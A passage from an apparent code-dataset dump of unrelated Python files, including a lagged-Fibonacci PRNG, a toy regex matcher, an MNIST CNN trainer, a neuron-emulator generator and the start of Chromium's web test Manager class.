return left == right
def all_equals(solution1, solution2, tol=0.001):
    """
    Tests equality of all tokens in two solutions.

    Rosalind allows for a default [absolute] error of 0.001 in all decimal
    answers unless otherwise stated.

    Fix: solutions with different token counts now compare unequal --
    ``zip`` used to truncate silently, so "1 2 3" matched "1 2".
    """
    tokens1 = solution1.split()
    tokens2 = solution2.split()
    if len(tokens1) != len(tokens2):
        return False
    for token1, token2 in zip(tokens1, tokens2):
        if not equals(token1, token2, tol=tol):
            print(token1, token2)
            return False
    return True
8,023 | 11e9d25c30c8c9945cfa3c234ffa1aab98d1869e | from math import gcd
from random import randint, choice
task = """6. Реализовать алгоритм построения ПСП методом Фиббоначи с
запаздываниями. Обосновать выбор коэффициентов алгоритма. Для
начального заполнения использовать стандартную линейную конгруэнтную
ПСП с выбранным периодом. Реализовать возможность для пользователя
вводить коэффициенты заранее."""
def factor(n):
    """Return the prime factorisation of n as an ascending list of primes."""
    primes = []
    divisor = 2
    # Trial division; once divisor*divisor > n the remainder is prime (or 1).
    while divisor * divisor <= n:
        quotient, remainder = divmod(n, divisor)
        if remainder == 0:
            primes.append(divisor)
            n = quotient
        else:
            divisor += 1
    if n > 1:
        primes.append(n)
    return primes
def get_coeff(period):
    """Pick LCG coefficients (a, c, x0) for modulus `period`.

    Follows the full-period (Hull-Dobell style) conditions: c coprime to the
    modulus; a - 1 divisible by every prime factor of the modulus, and by 4
    when the modulus is divisible by 4.
    NOTE(review): if no suitable b <= period exists, `a` is returned as None
    -- confirm callers tolerate that.
    """
    # Increment c: start random, bump until coprime with the modulus.
    c = randint(0, period)
    while gcd(c, period) != 1:
        c += 1
    b = 2
    a = None
    factor_result = factor(period)
    # Search for b = a - 1 divisible by all prime factors (and 4 if needed).
    while b <= period:
        if all([b % p == 0 for p in factor_result]):
            if period % 4 == 0:
                if b % 4 == 0:
                    a = b + 1
                    break
            else:
                a = b + 1
                break
        b += 1
    # Third element is a random seed x0 in [2, period].
    return a, c, randint(2, period)
def gen_linear_congruential(period):
    """Generate `period` values of a linear congruential sequence mod `period`.

    Coefficients and the seed come from get_coeff, so the sequence is
    intended to have full period.
    """
    coeff_a, coeff_c, x0 = get_coeff(period)
    result = [x0]
    for i in range(1, period):
        # x_i = (a * x_{i-1} + c) mod m
        result.append((coeff_a * result[i - 1] + coeff_c) % period)
    return result
def LFG(init, lst, m, count):
    """Lagged Fibonacci generator: extend `init` to `count` values mod 2**m.

    Each new term is the sum of the terms `j` positions back for every lag
    j in `lst`, reduced modulo 2**m.
    """
    sequence = list(init)
    modulus = 2 ** m
    while len(sequence) < count:
        new_term = sum(sequence[-j] for j in lst)
        sequence.append(new_term % modulus)
    return sequence
# Ask for the lag pair; empty input picks a known-good pair whose trinomial
# is primitive, guaranteeing a long period.
delays = input("Параметры запаздывания: ")
if not delays:
    # y = x^k + x^j + 1 must be primitive
    delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])
    k = delays[1] + 10
    m = 8
    print(f"delays = {delays}, k = {k}, m = {m}")
else:
    delays = [int(item) for item in delays.split()]
    k = int(input("Длина начального заполнения: "))
    m = int(input("Модуль: "))
# Seed the lagged-Fibonacci generator with an LCG sequence of length k,
# then emit 1000 values.
initial_filling = gen_linear_congruential(k)
print(LFG(initial_filling, delays, m, 1000))
|
8,024 | fbfc1749252cf8cbd9f8f72df268284d3e05d6dc | def regexp_engine(pattern, letter):
return pattern in ('', '.', letter)
def match_regexp(pattern, substring):
    """Anchored match of `pattern` against the start of `substring`.

    True once the pattern is fully consumed; otherwise both strings are
    walked in lockstep while each pattern char matches ('' / '.' / literal).
    Fix: returns an explicit False (instead of falling off the end and
    returning None) when the string runs out before the pattern does.
    """
    if not pattern:  # pattern exhausted: everything matched
        return True
    if substring and regexp_engine(pattern[0], substring[0]):
        return match_regexp(pattern[1:], substring[1:])
    return False  # mismatch, or string consumed before the pattern
def regexp(pattern, word):
    """Return True if `pattern` matches anywhere in `word` (substring search)."""
    if not word and pattern:
        # Word exhausted while the pattern still has content
        # (also covers the ' | ' input shape).
        return False
    if match_regexp(pattern, word):
        return True
    # No match at this offset: slide the window one character to the right.
    return regexp(pattern, word[1:])
print(regexp(*(input().split('|')))) |
8,025 | 46a3c3777d90976c7d39772d2e94430506d3acd7 | """
Day 2
"""
# Advent of Code day 2 password policies.
# Part 1: the policy letter's count must lie within the 'lo-hi' range.
# Part 2: exactly one of the two 1-based positions must hold the letter.
with open('input.txt', 'r') as f:
    lines = f.read()

lines = lines.split('\n')[:-1]
lines = [l.split(' ') for l in lines]

valid = 0
new_valid = 0
for cur_pw in lines:
    letter = cur_pw[1].strip(':')   # policy letter, e.g. 'a' from 'a:'
    amount = cur_pw[2].count(letter)
    rule = cur_pw[0].split('-')     # 'lo-hi' bounds
    rule = [int(r) for r in rule]
    if amount >= rule[0] and amount <= rule[1]:
        valid += 1
    # Concatenate the characters at the two 1-based positions; part 2 is
    # satisfied when exactly one of them is the policy letter.
    occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
    if occurences.count(letter) == 1:
        new_valid += 1

print(valid)
print(new_valid)
|
8,026 | fc89fdf17f887ea398be5b36d4d6f0444d64b3e0 | """script for subpixel experiment (not tested)
"""
import numpy as np
from tqdm import tqdm
import logging
from pathlib import Path
import paddle
import paddle.optimizer
import paddle.io
from utils.loader import dataLoader
from utils.loader import modelLoader
from utils.loader import pretrainedLoader
from utils.tools import dict_update
from utils.utils import labels2Dto3D
from utils.utils import flattenDetection
from utils.utils import labels2Dto3D_flattened
from utils.utils import pltImshow
from utils.utils import saveImg
from utils.utils import precisionRecall_torch
from utils.utils import save_checkpoint
@paddle.no_grad()
class Val_model_subpixel(object):
    """Loads a pretrained subpixel network and runs it on extracted patches."""
    # NOTE(review): @paddle.no_grad() decorating a *class* (not a callable)
    # is unusual -- confirm it actually disables gradients for these methods.
    def __init__(self, config, device='gpu', verbose=False):
        self.config = config
        self.model = self.config['name']        # model class name to load
        self.params = self.config['params']     # constructor kwargs
        self.weights_path = self.config['pretrained']
        self.device = device
        pass
    def loadModel(self):
        """Instantiate the network and restore weights from `pretrained`."""
        from utils.loader import modelLoader
        self.net = modelLoader(model=self.model, **self.params)
        checkpoint = paddle.load(self.weights_path)
        self.net.load_dict(checkpoint['model_state_dict'])
        self.net = self.net.to(self.device)
        logging.info('successfully load pretrained model from: %s',
                     self.weights_path)
        pass
    def extract_patches(self, label_idx, img):
        """Cut fixed-size patches from `img` centred on `label_idx` keypoints."""
        from utils.losses import extract_patches
        patch_size = self.config['params']['patch_size']
        patches = extract_patches(label_idx.to(self.device),
                                  img.to(self.device),
                                  patch_size=patch_size)
        return patches
        pass
    def run(self, patches):
        """Forward the patch batch through the network without gradients."""
        with paddle.no_grad():
            pred_res = self.net(patches)
        return pred_res
        pass
if __name__ == '__main__':
    # Smoke test: load the YAML config, pull two HPatches samples, extract
    # patches around two hard-coded points and run the subpixel net on them.
    filename = 'configs/magicpoint_repeatability.yaml'
    import yaml
    device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
    device = device.replace('cuda', 'gpu')
    device = paddle.set_device(device)
    paddle.set_default_dtype('float32')
    with open(filename, 'r') as f:
        config = yaml.load(f, Loader=yaml.FullLoader)
    task = config['data']['dataset']
    from utils.loader import dataLoader_test as dataLoader
    data = dataLoader(config, dataset='hpatches')
    test_set, test_loader = data['test_set'], data['test_loader']
    for i, sample in tqdm(enumerate(test_loader)):
        if i > 1:
            break
        val_agent = Val_model_subpixel(config['subpixel'], device=device)
        val_agent.loadModel()
        img = sample['image']
        print('image: ', img.shape)
        points = paddle.to_tensor([[1, 2], [3, 4]])
        def points_to_4d(points):
            # Prefix each (x, y) point with two zero columns -> (0, 0, x, y).
            num_of_points = points.shape[0]
            cols = paddle.to_tensor(paddle.zeros([num_of_points, 1]).requires_grad_(False), dtype=paddle.float32)
            points = paddle.concat((cols, cols, paddle.to_tensor(points, dtype=paddle.float32)), axis=1)
            return points
        label_idx = points_to_4d(points)
        patches = val_agent.extract_patches(label_idx, img)
        points_res = val_agent.run(patches)
|
8,027 | d4b9403366a16dfbb12a2161a996e641b3a785a5 | # __author__: Stanley
# date: 2018/10/22
class Foo:
    """Small demo of the item protocol (obj[k], obj[k] = v, del obj[k])."""

    def __init__(self, name, age):
        self.name = name
        self.age = age

    def __getitem__(self, key):
        # Indexing reads back the key shifted by ten.
        return 10 + key

    def __setitem__(self, key, value):
        # Item assignment simply echoes the key/value pair.
        print(key, value)

    def __delitem__(self, key):
        # Deleting an item echoes the key being removed.
        print(key)
obj = Foo("stnley", 25)
# Indexing automatically invokes Foo.__getitem__ on obj with 555 as argument.
result = obj[555]
print(result)
# Item assignment invokes Foo.__setitem__(111, 444).
obj[111] = 444
# `del` on an item invokes Foo.__delitem__(222).
del obj[222]
|
8,028 | 779e7cd05edfd74c8e60eaf5ce8443aea5fdaaef | #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
# @Time : 20-6-9 上午11:47
# @Author : zhufa
# @Software: PyCharm
"""
"""
tensorflow version must below 1.15
"""
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# Download/load MNIST with one-hot labels (train/validation/test splits).
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# Return a trainable weight tensor initialized from a truncated normal (stddev 0.1).
def weight_variable(shape, name):
    return tf.Variable(tf.truncated_normal(shape, stddev=0.1), name=name)
# Return a trainable bias tensor filled with the constant 0.1.
def bias_variable(shape, name):
    return tf.Variable(tf.constant(0.1, shape=shape), name=name)
# 2-D convolution of image x with kernel W; stride 1 and SAME padding keep
# the spatial size unchanged.
def conv2d(x, W):
    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
# 2x2 max pooling with stride 2: halves each spatial dimension.
def max_pool_2x2(x):
    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
                          padding='SAME')
# Layer 1: convolution + pooling
W_conv1 = weight_variable([5, 5, 1, 32], "W_conv1")  # 5x5 kernels, 1 input channel, 32 output channels (32 kernels)
b_conv1 = bias_variable([32], "b_conv1")
x = tf.placeholder("float", (None, 784), name='input_x')
# Reshape x into a 28x28 image tensor; -1 lets TF infer the batch size from x,
# and the trailing 1 is the channel count (would be 3 for color images).
reshaped_x = tf.reshape(x, [-1, 28, 28, 1])
h_conv1 = tf.nn.relu(conv2d(reshaped_x, W_conv1) + b_conv1)  # image size unchanged after convolution
h_pool1 = max_pool_2x2(h_conv1)  # image size is 14x14 after pooling
# Layer 2: convolution + pooling
W_conv2 = weight_variable([5, 5, 32, 64], "W_conv2")
b_conv2 = bias_variable([64], "b_conv2")
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)  # image size unchanged after convolution
h_pool2 = max_pool_2x2(h_conv2)  # image size is 7x7 after pooling
# Densely connected layer: 1024 neurons (fully connected)
W_fc1 = weight_variable([7 * 7 * 64, 1024], "W_fc1")
b_fc1 = bias_variable([1024], "b_fc1")
reshaped_h_pool2 = tf.reshape(h_pool2, [-1, 7 * 7 * 64])
h_fc1 = tf.nn.relu(tf.matmul(reshaped_h_pool2, W_fc1) + b_fc1)
# dropout (keep probability fed at run time: 0.5 for training, 1.0 for eval)
keep_prob = tf.placeholder("float", name='keep_prob')
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# Output layer: softmax over the 10 digit classes
W_fc2 = weight_variable([1024, 10], "W_fc2")
b_fc2 = bias_variable([10], "b_fc2")
y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)
# Cross-entropy loss and Adam training step
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = -tf.reduce_sum(y_ * tf.log(y_conv))
train = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
# Prepare for training: initialize all variables
sess = tf.Session()
sess.run(tf.initialize_all_variables())
# Model accuracy: fraction of matching argmax predictions
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
# Set up the model saver (checkpointing helper).
'''设置模型保存器'''
m_saver = tf.train.Saver()
# Train on random 100-sample batches, reporting test accuracy every 100 steps.
# (The original comment said 20000 iterations, but the loop runs 10000.)
for i in range(10000):
    batch_xs, batch_ys = mnist.train.next_batch(100)
    if i % 100 == 0:
        step_accuracy = accuracy.eval(session=sess,
                                      feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})
        print "step %d test accuracy: %g" % (i, step_accuracy)
    sess.run(train, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})
# Save model parameters; see mnist_test.py for how to load and use the model.
# m_saver.save(sess, "model/mnist-model", global_step=10000)
print "test accuracy: %g" % accuracy.eval(session=sess,
                                          feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})
|
8,029 | 1221394dfb97cbbfb00b412f60d4df521acc1262 |
# MODULES
import sys
sys.path.append('~/Documents/Project_3/REPO')
from scipy import *
from scipy import linalg
import cPickle as pickle
import ConfigParser
import TobySpectralMethods as tsm
# Read simulation parameters from config.cfg (Python 2 ConfigParser API).
config = ConfigParser.RawConfigParser()
fp = open('config.cfg')
config.readfp(fp)
N = config.getint('General', 'N')            # number of Fourier modes
M = config.getint('General', 'M')            # number of Chebyshev modes
Re = config.getfloat('General', 'Re')        # Reynolds number
kx = config.getfloat('General', 'kx')        # streamwise wavenumber
dt = config.getfloat('Time Iteration', 'dt')
totTime = config.getfloat('Time Iteration', 'totTime')
numFrames = config.getint('Time Iteration', 'numFrames')
fp.close()
# Amplitude of the random perturbation applied to the first Fourier mode.
amp = 0.025
tsm.initTSM(N_=N, M_=M, kx_=kx)
def mk_PSI_ECS_guess():
    """Build an initial-guess streamfunction spectrum PSI for an ECS search.

    Starts from a fixed base-flow profile in the zeroth Fourier mode, adds a
    small random perturbation to the first Fourier mode (mirrored into its
    complex conjugate), scales the base flow down, and prints the kinetic
    energies of the lowest modes as a sanity check.

    Relies on module-level globals: N, M, vecLen, amp, MDX, MDY, INTY and tsm.
    Returns the complex coefficient vector PSI of length vecLen.
    """
    PSI = zeros(vecLen, dtype='complex')
    # Base-flow Chebyshev coefficients of the zeroth Fourier mode.
    PSI[N*M] += 2.0/3.0
    PSI[N*M+1] += 3.0/4.0
    PSI[N*M+2] += 0.0
    PSI[N*M+3] += -1.0/12.0
    # Perturb 3 of 4 of first Chebyshevs of the 1st Fourier mode
    PSI[(N-1)*M] = -random.normal(loc=amp, scale=0.001)
    PSI[(N-1)*M+2] = random.normal(loc=amp, scale=0.001)
    PSI[(N-1)*M+4] = -0.1*random.normal(loc=amp, scale=0.001)
    PSI[(N-1)*M+6] = -0.05*random.normal(loc=amp, scale=0.001)
    # Mirror the perturbation into the conjugate mode so PSI stays real in
    # physical space.
    PSI[(N+1)*M:(N+2)*M] = conjugate(PSI[(N-1)*M:N*M])
    # reduce the base flow KE by a roughly corresponding amount (8pc), with this
    # energy in the perturbation (hopefully). ( 0.96 is about root(0.92) )
    bfReduc = 0.8
    PSI[N*M:(N+1)*M] = bfReduc*PSI[N*M:(N+1)*M]
    # Check to make sure energy is large enough to get an ECS
    U = dot(MDY, PSI)
    V = - dot(MDX, PSI)
    MMU = tsm.prod_mat(U)
    MMV = tsm.prod_mat(V)
    Usq = dot(MMU, U) + dot(MMV, V)
    Usq1 = Usq[(N-1)*M:N*M] + Usq[(N+1)*M:(N+2)*M]
    Usq2 = Usq[(N-2)*M:(N-1)*M] + Usq[(N+2)*M:(N+3)*M]
    KE0 = 0.5*dot(INTY, Usq[N*M:(N+1)*M])
    KE1 = 0.5*dot(INTY, Usq1)
    KE2 = 0.5*dot(INTY, Usq2)
    print 'Kinetic energy of 0th mode is: ', KE0
    print 'Kinetic energy of 1st mode is: ', KE1
    print 'TOTAL: ', KE0+KE1+KE2
    print 'norm of 0th mode is: ', linalg.norm(PSI[N*M:(N+1)*M], 2)
    print 'norm of 1st mode is: ', linalg.norm(PSI[(N-1)*M:N*M] +
                                               PSI[(N+1)*M:(N+2)*M], 2)
    return PSI
# MAIN
# Total length of the spectral coefficient vector: (2N+1) Fourier modes
# times M Chebyshev modes.
vecLen = (2*N+1)*M
# Useful operators
MDY = tsm.mk_diff_y()
MDYY = dot(MDY,MDY)
MDYYY = dot(MDY,MDYY)
MDX = tsm.mk_diff_x()
MDXX = dot(MDX, MDX)
MDXY = dot(MDX, MDY)
LAPLAC = dot(MDX,MDX) + dot(MDY,MDY)
BIHARM = dot(LAPLAC, LAPLAC)
MDXLAPLAC = dot(MDX, LAPLAC)
MDYLAPLAC = dot(MDY, LAPLAC)
# single mode Operators
SMDY = tsm.mk_single_diffy()
SMDYY = dot(SMDY, SMDY)
SMDYYY = dot(SMDY, SMDYY)
INTY = tsm.mk_cheb_int()
# Identity
SII = eye(M, M, dtype='complex')
# Build the initial guess and persist it for the ECS solver to pick up.
PSI = mk_PSI_ECS_guess()
pickle.dump(PSI, open('psi.init', 'w'))
|
8,030 | 177401f25471cf1cbd32dd0770acdc12bf271361 | import os
from NeuralEmulator.Configurators.NormalLeakSourceConfigurator import NormalLeakSourceConfigurator
from NeuralEmulator.Configurators.OZNeuronConfigurator import OZNeuronConfigurator
from NeuralEmulator.Configurators.PulseSynapseConfigurator import PulseSynapseConfigurator
from NeuralEmulator.NormalLeakSource import NormalLeakSource
from NeuralEmulator.OZNeuron import OZNeuron
from NeuralEmulator.Preprocessing.NegPreprocessingBlock import NegPreprocessingBlock
from NeuralEmulator.Preprocessing.PosPreprocessingBlock import PosPreprocessingBlock
from NeuralEmulator.Preprocessing.PreprocessingBlock import PreprocessingBlock
from NeuralEmulator.PulseSynapse import PulseSynapse
from NeuralEmulator.Test.SimpleVoltageSource import SimpleVoltageSource
import random
class NeuronsGenerator:
    """Generate a population of OZ neurons driven by a shared synapse.

    Each neuron gets its own leak source whose voltage either steps evenly
    from `upperBound` down toward `lowerBound` (default), or — with
    `randomVals=True` — is a distinct random millivolt value drawn from
    [lowerBound, upperBound].
    """

    def __init__(self, neuronsNumber, synapse, lowerBound=100.0 * (10 ** -3), upperBound=800.0 * (10 ** -3), randomVals=False):
        leak_configurator = NormalLeakSourceConfigurator()
        neuron_configurator = OZNeuronConfigurator()
        neurons = []
        leaks = []
        if not randomVals:
            # Evenly spaced leak voltages, starting at the upper bound.
            vlk = upperBound
            step = (upperBound - lowerBound) / neuronsNumber
            for _ in range(neuronsNumber):
                leak = NormalLeakSource(SimpleVoltageSource(vlk), leak_configurator)
                leaks.append(leak)
                neurons.append(OZNeuron(synapse, leak, neuron_configurator))
                vlk -= step
        else:
            # Work in integer millivolts so set membership guarantees distinct
            # values; convert back to volts when building the sources.
            # (Fixes the original `uppderBound` typo and no longer clobbers
            # the `lowerBound` parameter with its millivolt conversion.)
            lower_mv = int(lowerBound * (10 ** 3))
            upper_mv = int(upperBound * (10 ** 3))
            mv_values = set()
            while len(mv_values) != neuronsNumber:
                mv_values.add(random.randint(lower_mv, upper_mv))
            for _ in range(neuronsNumber):
                vlk = mv_values.pop() * (10 ** -3)
                leak = NormalLeakSource(SimpleVoltageSource(vlk), leak_configurator)
                leaks.append(leak)
                neurons.append(OZNeuron(synapse, leak, neuron_configurator))
        self.neurons = neurons
        self.leaks = leaks

    def getNeurons(self):
        """Return the generated OZNeuron instances."""
        return self.neurons

    def getLeaks(self):
        """Return the NormalLeakSource feeding each neuron."""
        return self.leaks
if __name__ == "__main__":
    # Point the simulator at a local config directory (machine-specific path).
    os.environ["NERUSIM_CONF"] = r"C:\Users\Avi\Desktop\IntelliSpikesLab\Emulator\config"
    vin = SimpleVoltageSource()
    # Preprocess the raw voltage and feed its positive component to the neurons.
    preProcessBlock = PreprocessingBlock(vin)
    vposPort = PosPreprocessingBlock(preProcessBlock)
    # Build 50 neurons with randomly drawn leak voltages.
    g = NeuronsGenerator(50, vposPort, randomVals=True)
    neurons = g.getNeurons()
    print("sf")
|
8,031 | c2d6e4286e1b9d6dc852bde994da60d353e03e5c | from youtube_transcript_api import YouTubeTranscriptApi
# Fetch the English transcript for a fixed video and dump it line by line.
transcript_list = YouTubeTranscriptApi.list_transcripts('i8pOulVUz0A')
transcript = transcript_list.find_transcript(['en'])
transcript = transcript.fetch()
# Explicit utf-8 avoids UnicodeEncodeError on platforms whose default text
# encoding cannot represent characters appearing in the transcript.
with open("transcript.txt", 'w', encoding='utf-8') as f:
    for line in transcript:
        f.write(line['text'] + '\n')
# Print each line of dwarfs.txt prefixed with its 1-based line number.
with open('dwarfs.txt') as fh:
    for i, line in enumerate(fh, start=1):
        # `line` keeps its trailing newline, so entries print double-spaced.
        print("[%d] %s" % (i, line))
|
8,033 | 08b57c00beb8dfedfee1bc032b8c281d7a151931 | # Copyright (C) 2010 Google Inc. All rights reserved.
# Copyright (C) 2010 Gabor Rapcsanyi (rgabor@inf.u-szeged.hu), University of Szeged
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The Manager orchestrates the overall process of running web tests.
This includes finding tests to run, reading the test expectations,
starting the required helper servers, deciding the order and way to
run the tests, retrying failed tests, and collecting the test results,
including crash logs and mismatches with expectations.
The Manager object has a constructor and one main method called run.
"""
import fnmatch
import json
import logging
import os
import random
import signal
import sys
import time
from blinkpy.common import exit_codes
from blinkpy.common.path_finder import PathFinder
from blinkpy.tool import grammar
from blinkpy.web_tests.controllers.test_result_sink import CreateTestResultSink
from blinkpy.web_tests.controllers.web_test_finder import WebTestFinder
from blinkpy.web_tests.controllers.web_test_runner import WebTestRunner
from blinkpy.web_tests.layout_package import json_results_generator
from blinkpy.web_tests.models import test_expectations
from blinkpy.web_tests.models import test_failures
from blinkpy.web_tests.models import test_run_results
from blinkpy.web_tests.models.typ_types import ResultType
from blinkpy.web_tests.models.test_input import TestInput
_log = logging.getLogger(__name__)
TestExpectations = test_expectations.TestExpectations
class Manager(object):
    """A class for managing running a series of web tests."""
    # Test-path prefixes with special handling (server needs / locking).
    HTTP_SUBDIR = 'http'
    PERF_SUBDIR = 'perf'
    WEBSOCKET_SUBDIR = 'websocket'
    ARCHIVED_RESULTS_LIMIT = 25
    def __init__(self, port, options, printer):
        """Initializes test runner data structures.
        Args:
            port: An object implementing platform-specific functionality.
            options: An options argument which contains command line options.
            printer: A Printer object to record updates to.
        """
        self._port = port
        self._filesystem = port.host.filesystem
        self._options = options
        self._printer = printer
        self._expectations = None
        self._http_server_started = False
        self._wptserve_started = False
        self._websockets_server_started = False
        self._results_directory = self._port.results_directory()
        self._artifacts_directory = self._port.artifacts_directory()
        self._finder = WebTestFinder(self._port, self._options)
        self._path_finder = PathFinder(port.host.filesystem)
        self._sink = CreateTestResultSink(self._port)
        self._runner = WebTestRunner(self._options, self._port, self._printer,
                                     self._results_directory,
                                     self._test_is_slow, self._sink)
    def run(self, args):
        """Runs the tests and return a RunDetails object with the results."""
        start_time = time.time()
        self._printer.write_update('Collecting tests ...')
        running_all_tests = False
        try:
            paths, all_test_names, running_all_tests = self._collect_tests(
                args)
        except IOError:
            # This is raised if --test-list doesn't exist
            return test_run_results.RunDetails(
                exit_code=exit_codes.NO_TESTS_EXIT_STATUS)
        test_names = self._finder.split_into_chunks(all_test_names)
        if self._options.order == 'natural':
            test_names.sort(key=self._port.test_key)
        elif self._options.order == 'random':
            # Sort first so the shuffle is deterministic for a given seed.
            test_names.sort()
            random.Random(self._options.seed).shuffle(test_names)
        elif self._options.order == 'none':
            # Restore the test order to user specified order.
            # base.tests() may change the order as it returns tests in the
            # real, external/wpt, virtual order.
            if paths:
                test_names = self._restore_order(paths, test_names)
        if not self._options.no_expectations:
            self._printer.write_update('Parsing expectations ...')
            self._expectations = test_expectations.TestExpectations(self._port)
        tests_to_run, tests_to_skip = self._prepare_lists(paths, test_names)
        self._printer.print_found(
            len(all_test_names), len(test_names), len(tests_to_run),
            self._options.repeat_each, self._options.iterations)
        # Check to make sure we're not skipping every test.
        if not tests_to_run:
            msg = 'No tests to run.'
            if self._options.zero_tests_executed_ok:
                _log.info(msg)
                # Keep executing to produce valid (but empty) results.
            else:
                _log.critical(msg)
                code = exit_codes.NO_TESTS_EXIT_STATUS
                return test_run_results.RunDetails(exit_code=code)
        exit_code = self._set_up_run(tests_to_run)
        if exit_code:
            return test_run_results.RunDetails(exit_code=exit_code)
        if self._options.num_retries is None:
            # If --test-list is passed, or if no test narrowing is specified,
            # default to 3 retries. Otherwise [e.g. if tests are being passed by
            # name], default to 0 retries.
            if self._options.test_list or len(paths) < len(test_names):
                self._options.num_retries = 3
            else:
                self._options.num_retries = 0
        should_retry_failures = self._options.num_retries > 0
        try:
            self._register_termination_handler()
            self._start_servers(tests_to_run)
            if self._options.watch:
                run_results = self._run_test_loop(tests_to_run, tests_to_skip)
            else:
                run_results = self._run_test_once(tests_to_run, tests_to_skip,
                                                  should_retry_failures)
            initial_results, all_retry_results = run_results
        finally:
            _log.info("Finally stop servers and clean up")
            self._stop_servers()
            self._clean_up_run()
        if self._options.no_expectations:
            return test_run_results.RunDetails(0, [], [], initial_results,
                                               all_retry_results)
        # Some crash logs can take a long time to be written out so look
        # for new logs after the test run finishes.
        self._printer.write_update('Looking for new crash logs ...')
        self._look_for_new_crash_logs(initial_results, start_time)
        for retry_attempt_results in all_retry_results:
            self._look_for_new_crash_logs(retry_attempt_results, start_time)
        self._printer.write_update('Summarizing results ...')
        summarized_full_results = test_run_results.summarize_results(
            self._port, self._options, self._expectations, initial_results,
            all_retry_results)
        summarized_failing_results = test_run_results.summarize_results(
            self._port,
            self._options,
            self._expectations,
            initial_results,
            all_retry_results,
            only_include_failing=True)
        run_histories = test_run_results.test_run_histories(
            self._options, self._expectations, initial_results,
            all_retry_results)
        # The exit code reports the number of regressions, capped below.
        exit_code = summarized_failing_results['num_regressions']
        if exit_code > exit_codes.MAX_FAILURES_EXIT_STATUS:
            _log.warning('num regressions (%d) exceeds max exit status (%d)',
                         exit_code, exit_codes.MAX_FAILURES_EXIT_STATUS)
            exit_code = exit_codes.MAX_FAILURES_EXIT_STATUS
        if not self._options.dry_run:
            self._write_json_files(summarized_full_results,
                                   summarized_failing_results, initial_results,
                                   running_all_tests, run_histories)
            self._copy_results_html_file(self._artifacts_directory,
                                         'results.html')
            if (initial_results.interrupt_reason is
                    test_run_results.InterruptReason.EXTERNAL_SIGNAL):
                exit_code = exit_codes.INTERRUPTED_EXIT_STATUS
            else:
                if initial_results.interrupted:
                    exit_code = exit_codes.EARLY_EXIT_STATUS
                if (self._options.show_results
                        and (exit_code or initial_results.total_failures)):
                    self._port.show_results_html_file(
                        self._filesystem.join(self._artifacts_directory,
                                              'results.html'))
                self._printer.print_results(time.time() - start_time,
                                            initial_results)
        return test_run_results.RunDetails(exit_code, summarized_full_results,
                                           summarized_failing_results,
                                           initial_results, all_retry_results)
    def _register_termination_handler(self):
        """Install a handler that turns SIGTERM/SIGBREAK into KeyboardInterrupt."""
        if self._port.host.platform.is_win():
            signum = signal.SIGBREAK
        else:
            signum = signal.SIGTERM
        signal.signal(signum, self._on_termination)
    def _on_termination(self, signum, _frame):
        """Signal handler: log the signal and abort the run via KeyboardInterrupt."""
        self._printer.write_update(
            'Received signal "%s" (%d) in %d' %
            (signal.strsignal(signum), signum, os.getpid()))
        raise KeyboardInterrupt
    def _run_test_loop(self, tests_to_run, tests_to_skip):
        """Interactive watch mode: re-run the tests until the user quits."""
        # Don't show results in a new browser window because we're already
        # printing the link to diffs in the loop
        self._options.show_results = False
        while True:
            initial_results, all_retry_results = self._run_test_once(
                tests_to_run, tests_to_skip, should_retry_failures=False)
            for name in initial_results.failures_by_name:
                failure = initial_results.failures_by_name[name][0]
                if isinstance(failure, test_failures.FailureTextMismatch):
                    full_test_path = self._filesystem.join(
                        self._artifacts_directory, name)
                    filename, _ = self._filesystem.splitext(full_test_path)
                    pretty_diff_path = 'file://' + filename + '-pretty-diff.html'
                    self._printer.writeln('Link to pretty diff:')
                    self._printer.writeln(pretty_diff_path + '\n')
            self._printer.writeln('Finished running tests')
            user_input = self._port.host.user.prompt(
                'Interactive watch mode: (q)uit (r)etry\n').lower()
            if user_input == 'q' or user_input == 'quit':
                return (initial_results, all_retry_results)
    def _run_test_once(self, tests_to_run, tests_to_skip,
                       should_retry_failures):
